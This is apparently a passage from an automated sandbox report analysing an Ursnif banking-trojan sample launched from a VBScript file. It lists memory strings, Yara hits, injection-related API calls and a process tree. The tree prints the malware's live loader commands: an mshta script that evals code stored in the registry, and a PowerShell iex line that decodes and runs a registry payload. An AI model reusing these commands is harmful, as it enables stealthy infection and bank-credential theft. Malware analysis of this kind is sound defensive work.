Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 0000001F.00000000.549206559.000000000B1A6000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: explorer.exe, 0000001F.00000000.546278603.0000000007693000.00000002.00000001.sdmp	String found in binary or memory: http://z.about.com/m/a08.ico
Source: powershell.exe, 00000016.00000003.464342861.00000265015AE000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000016.00000003.464342861.00000265015AE000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000016.00000003.464342861.00000265015AE000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000016.00000003.463966889.00000265013EA000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000016.00000003.464342861.00000265015AE000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000016.00000003.463561816.000002650102F000.00000004.00000001.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000016.00000003.463561816.000002650102F000.00000004.00000001.sdmp	String found in binary or memory: https://oneget.orgX
Source: powershell.exe, 00000016.00000003.463561816.000002650102F000.00000004.00000001.sdmp	String found in binary or memory: https://oneget.orgformat.ps1xmlagement.dll2040.missionsand

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Source: Yara match	File source: 00000003.00000003.414828910.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.506842838.000002656DBD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.414892314.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.509721795.00000000027B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.423836026.0000000004BDB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.612829369.000002191303E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.612699598.0000021DB8A3E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.491033572.0000000004170000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.414853101.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.414912288.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.532328464.0000000004E1E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.414925514.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.414730489.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.414774270.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.414871579.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.562589004.0000000000C0E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.622893274.0000000004E1E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.515908651.00000000052D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.610642121.000002DACE3AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.499431243.0000027A6FE50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 4456, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3440, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 1040, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Source: Yara match	File source: 00000003.00000003.414828910.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000003.506842838.000002656DBD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.414892314.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.509721795.00000000027B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.423836026.0000000004BDB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.612829369.000002191303E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.612699598.0000021DB8A3E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.491033572.0000000004170000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.414853101.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.414912288.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.532328464.0000000004E1E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.414925514.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.414730489.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.414774270.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.414871579.0000000004D58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.562589004.0000000000C0E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.622893274.0000000004E1E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.515908651.00000000052D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.610642121.000002DACE3AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.499431243.0000027A6FE50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 4456, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3440, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 1040, type: MEMORY

Disables SPDY (HTTP compression, likely to perform web injects)

Source: C:\Windows\explorer.exe

Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

Contains functionality to call native functions

Source: C:\Windows\System32\control.exe	Code function: 28_2_00BE3830 NtWriteVirtualMemory,	28_2_00BE3830
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BE387C NtCreateSection,	28_2_00BE387C
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BDBAB4 NtAllocateVirtualMemory,	28_2_00BDBAB4
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BE1AC4 NtQueryInformationProcess,	28_2_00BE1AC4
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BDCCA0 NtReadVirtualMemory,	28_2_00BDCCA0
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BFADD4 NtQueryInformationProcess,	28_2_00BFADD4
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BEF560 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,	28_2_00BEF560
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BFF7EC NtQueryInformationToken,NtQueryInformationToken,NtClose,	28_2_00BFF7EC
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BEFFCC NtMapViewOfSection,	28_2_00BEFFCC
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BF676C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,	28_2_00BF676C
Source: C:\Windows\System32\control.exe	Code function: 28_2_00C11003 NtProtectVirtualMemory,NtProtectVirtualMemory,	28_2_00C11003
Source: C:\Windows\explorer.exe	Code function: 31_2_04DECCA0 NtReadVirtualMemory,	31_2_04DECCA0
Source: C:\Windows\explorer.exe	Code function: 31_2_04DFF560 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,	31_2_04DFF560
Source: C:\Windows\explorer.exe	Code function: 31_2_04DFAD14 NtQuerySystemInformation,	31_2_04DFAD14
Source: C:\Windows\explorer.exe	Code function: 31_2_04E0F7EC NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose,	31_2_04E0F7EC
Source: C:\Windows\explorer.exe	Code function: 31_2_04DFFFCC NtMapViewOfSection,	31_2_04DFFFCC
Source: C:\Windows\explorer.exe	Code function: 31_2_04E0676C RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,	31_2_04E0676C
Source: C:\Windows\explorer.exe	Code function: 31_2_04DF387C NtCreateSection,	31_2_04DF387C
Source: C:\Windows\explorer.exe	Code function: 31_2_04DF3830 NtWriteVirtualMemory,	31_2_04DF3830
Source: C:\Windows\explorer.exe	Code function: 31_2_04DF1AC4 NtQueryInformationProcess,	31_2_04DF1AC4
Source: C:\Windows\explorer.exe	Code function: 31_2_04DEBAB4 NtAllocateVirtualMemory,	31_2_04DEBAB4
Source: C:\Windows\explorer.exe	Code function: 31_2_04E21003 NtProtectVirtualMemory,NtProtectVirtualMemory,	31_2_04E21003

Detected potential crypto function

Source: C:\Windows\System32\control.exe	Code function: 28_2_00BFC164	28_2_00BFC164
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BFA4BC	28_2_00BFA4BC
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BF676C	28_2_00BF676C
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BFE080	28_2_00BFE080
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BF20F8	28_2_00BF20F8
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BD203C	28_2_00BD203C
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BF0034	28_2_00BF0034
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BF6064	28_2_00BF6064
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BEB040	28_2_00BEB040
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BF91A0	28_2_00BF91A0
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BE9138	28_2_00BE9138
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BDC134	28_2_00BDC134
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BE1174	28_2_00BE1174
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BFF940	28_2_00BFF940
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BF8224	28_2_00BF8224
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BF3208	28_2_00BF3208
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BE9380	28_2_00BE9380
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BD2BC8	28_2_00BD2BC8
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BD7320	28_2_00BD7320
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BD8B5C	28_2_00BD8B5C
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BE8B4C	28_2_00BE8B4C
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BF94B8	28_2_00BF94B8
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BE9CB0	28_2_00BE9CB0
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BED4A8	28_2_00BED4A8
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BDBCF8	28_2_00BDBCF8
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BE3CE0	28_2_00BE3CE0
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BF74CC	28_2_00BF74CC
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BE0CC0	28_2_00BE0CC0
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BDD460	28_2_00BDD460
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BE1D94	28_2_00BE1D94
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BE452C	28_2_00BE452C
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BEB520	28_2_00BEB520
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BFB516	28_2_00BFB516
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BD6D08	28_2_00BD6D08
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BF26B4	28_2_00BF26B4
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BFBEB0	28_2_00BFBEB0
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BDAE04	28_2_00BDAE04
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BD37B8	28_2_00BD37B8
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BE17B8	28_2_00BE17B8
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BFAFB8	28_2_00BFAFB8
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BD9F98	28_2_00BD9F98
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BEF770	28_2_00BEF770
Source: C:\Windows\System32\control.exe	Code function: 28_2_00BDB75C	28_2_00BDB75C
Source: C:\Windows\explorer.exe	Code function: 31_2_04E0A4BC	31_2_04E0A4BC
Source: C:\Windows\explorer.exe	Code function: 31_2_04E0AFB8	31_2_04E0AFB8
Source: C:\Windows\explorer.exe	Code function: 31_2_04DE37B8	31_2_04DE37B8
Source: C:\Windows\explorer.exe	Code function: 31_2_04DEB75C	31_2_04DEB75C
Source: C:\Windows\explorer.exe	Code function: 31_2_04E0676C	31_2_04E0676C
Source: C:\Windows\explorer.exe	Code function: 31_2_04DFF770	31_2_04DFF770
Source: C:\Windows\explorer.exe	Code function: 31_2_04E00034	31_2_04E00034
Source: C:\Windows\explorer.exe	Code function: 31_2_04E091A0	31_2_04E091A0
Source: C:\Windows\explorer.exe	Code function: 31_2_04E0C164	31_2_04E0C164
Source: C:\Windows\explorer.exe	Code function: 31_2_04DF9138	31_2_04DF9138
Source: C:\Windows\explorer.exe	Code function: 31_2_04DEC134	31_2_04DEC134
Source: C:\Windows\explorer.exe	Code function: 31_2_04DF0CC0	31_2_04DF0CC0
Source: C:\Windows\explorer.exe	Code function: 31_2_04DEBCF8	31_2_04DEBCF8
Source: C:\Windows\explorer.exe	Code function: 31_2_04E074CC	31_2_04E074CC
Source: C:\Windows\explorer.exe	Code function: 31_2_04DF3CE0	31_2_04DF3CE0
Source: C:\Windows\explorer.exe	Code function: 31_2_04E094B8	31_2_04E094B8
Source: C:\Windows\explorer.exe	Code function: 31_2_04DF9CB0	31_2_04DF9CB0
Source: C:\Windows\explorer.exe	Code function: 31_2_04DFD4A8	31_2_04DFD4A8
Source: C:\Windows\explorer.exe	Code function: 31_2_04DE5474	31_2_04DE5474
Source: C:\Windows\explorer.exe	Code function: 31_2_04DED460	31_2_04DED460
Source: C:\Windows\explorer.exe	Code function: 31_2_04DF1D94	31_2_04DF1D94
Source: C:\Windows\explorer.exe	Code function: 31_2_04DE6D08	31_2_04DE6D08
Source: C:\Windows\explorer.exe	Code function: 31_2_04DF452C	31_2_04DF452C
Source: C:\Windows\explorer.exe	Code function: 31_2_04E0B516	31_2_04E0B516
Source: C:\Windows\explorer.exe	Code function: 31_2_04DFB520	31_2_04DFB520
Source: C:\Windows\explorer.exe	Code function: 31_2_04E0BEB0	31_2_04E0BEB0
Source: C:\Windows\explorer.exe	Code function: 31_2_04E026B4	31_2_04E026B4
Source: C:\Windows\explorer.exe	Code function: 31_2_04DEAE04	31_2_04DEAE04
Source: C:\Windows\explorer.exe	Code function: 31_2_04DE9F98	31_2_04DE9F98
Source: C:\Windows\explorer.exe	Code function: 31_2_04DF17B8	31_2_04DF17B8
Source: C:\Windows\explorer.exe	Code function: 31_2_04E020F8	31_2_04E020F8
Source: C:\Windows\explorer.exe	Code function: 31_2_04E0E080	31_2_04E0E080
Source: C:\Windows\explorer.exe	Code function: 31_2_04E06064	31_2_04E06064
Source: C:\Windows\explorer.exe	Code function: 31_2_04DFB040	31_2_04DFB040
Source: C:\Windows\explorer.exe	Code function: 31_2_04DE203C	31_2_04DE203C
Source: C:\Windows\explorer.exe	Code function: 31_2_04E0F940	31_2_04E0F940
Source: C:\Windows\explorer.exe	Code function: 31_2_04DF1174	31_2_04DF1174
Source: C:\Windows\explorer.exe	Code function: 31_2_04E08224	31_2_04E08224
Source: C:\Windows\explorer.exe	Code function: 31_2_04E03208	31_2_04E03208
Source: C:\Windows\explorer.exe	Code function: 31_2_04DE2BC8	31_2_04DE2BC8
Source: C:\Windows\explorer.exe	Code function: 31_2_04DF9380	31_2_04DF9380
Source: C:\Windows\explorer.exe	Code function: 31_2_04DE8B5C	31_2_04DE8B5C
Source: C:\Windows\explorer.exe	Code function: 31_2_04DF8B4C	31_2_04DF8B4C
Source: C:\Windows\explorer.exe	Code function: 31_2_04DE7320	31_2_04DE7320

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\earmark.avchd 66EAF5C2BC2EC2A01D74DB9CC50744C748388CD9B0FA1F07181E639E128803EF

Java / VBScript file with very long strings (likely obfuscated code)

Source: 6znkPyTAVN7V.vbs

Initial sample: Strings found which are bigger than 50

PE file does not import any functions

Source: dvgqxizg.dll.29.dr	Static PE information: No import functions for PE file found
Source: 41myt1z4.dll.26.dr	Static PE information: No import functions for PE file found

Searches for the Microsoft Outlook file path

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: C:\Windows\explorer.exe	Section loaded: cryptdlg.dll
Source: C:\Windows\explorer.exe	Section loaded: msoert2.dll
Source: C:\Windows\explorer.exe	Section loaded: msimg32.dll

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5288:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2916:120:WilError_01
Source: C:\Windows\System32\control.exe	Mutant created: \Sessions\1\BaseNamedObjects\{CE3E3C9F-D537-30A7-CFE2-D96473361DD8}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{5681524C-BDC8-F872-F7EA-41AC1BBE05A0}

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll

Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Windows\System32\wscript.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Windows\System32\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\nslookup.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\6znkPyTAVN7V.vbs'
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6592 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6592 CREDAT:17420 /prefetch:2
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\41myt1z4\41myt1z4.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES2F3F.tmp' 'c:\Users\user\AppData\Local\Temp\41myt1z4\CSC9757D2D6F9F84ABABCD57DA7E4EFF939.TMP'
Source: unknown	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\dvgqxizg\dvgqxizg.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4817.tmp' 'c:\Users\user\AppData\Local\Temp\dvgqxizg\CSC2062E18B5949488FB5158C917D4EBA9.TMP'
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\9047.bi1'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6592 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6592 CREDAT:17420 /prefetch:2	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\41myt1z4\41myt1z4.cmdline'	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\dvgqxizg\dvgqxizg.cmdline'	Jump to behavior
